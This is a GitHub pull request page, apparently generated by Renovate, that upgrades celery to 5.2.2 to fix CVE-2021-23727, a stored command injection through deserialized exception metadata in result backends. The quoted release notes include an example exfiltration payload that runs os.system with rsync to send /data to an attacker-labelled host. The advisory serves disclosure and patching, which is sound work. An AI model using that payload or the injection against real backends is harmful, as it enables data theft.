chore(deps): update dependency celery to v5 [security] #1405
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
==4.4.7
->==5.2.2
GitHub Vulnerability Alerts
CVE-2021-23727
This affects the package celery before 5.2.2. It by default trusts the messages and metadata stored in backends (result stores). When reading task metadata from the backend, the data is deserialized. Given that an attacker can gain access to, or somehow manipulate the metadata within a celery backend, they could trigger a stored command injection vulnerability and potentially gain further access to the system.
Release Notes
celery/celery (celery)
v5.2.2
Compare Source
=====
:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data attacker@192.168.56.100:~/data")
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload
rsync /data attacker@192.168.56.100:~/data
as the exception arguments like so:.. code-block:: python
According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.
.. _version-5.2.1:
v5.2.1
Compare Source
=====
:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin
.. _version-5.2.0:
v5.2.0
Compare Source
=====
:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin
.. _version-5.2.0rc2:
v5.1.2
Compare Source
Release date: 2021-06-28 16.15 P.M UTC+3:00
Release by: Omer Katz
When chords fail, correctly call errbacks. (#6814)
Avoid using the
Event.isSet()
deprecated alias. (#6824)Reintroduce sys.argv default behaviour for
Celery.start()
. (#6825)v5.1.1
Compare Source
Release date: 2021-06-17 16.10 P.M UTC+3:00
Release by: Omer Katz
Fix
--pool=threads
support in command line options parsing.(#6787)
Fix
LoggingProxy.write()
return type. (#6791)Couchdb key is now always coerced into a string. (#6781)
Ensure regen utility class gets marked as done when concertised.
(#6789)
Preserve call/errbacks of replaced tasks. (#6770)
Use single-lookahead for regen consumption. (#6799)
Revoked tasks are no longer incorrectly marked as retried. (#6812,
#6816)
v5.1.0
Compare Source
Release date: 2021-05-23 19.20 P.M UTC+3:00
Release by: Omer Katz
celery -A app events -c camera
now works as expected. (#6774)v5.0.6
Compare Source
v5.0.5
Compare Source
v5.0.4
Compare Source
v5.0.3
Compare Source
v5.0.2
Compare Source
v5.0.1
Compare Source
v5.0.0
Compare Source
Configuration
📅 Schedule: Branch creation - "" in timezone UTC, Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.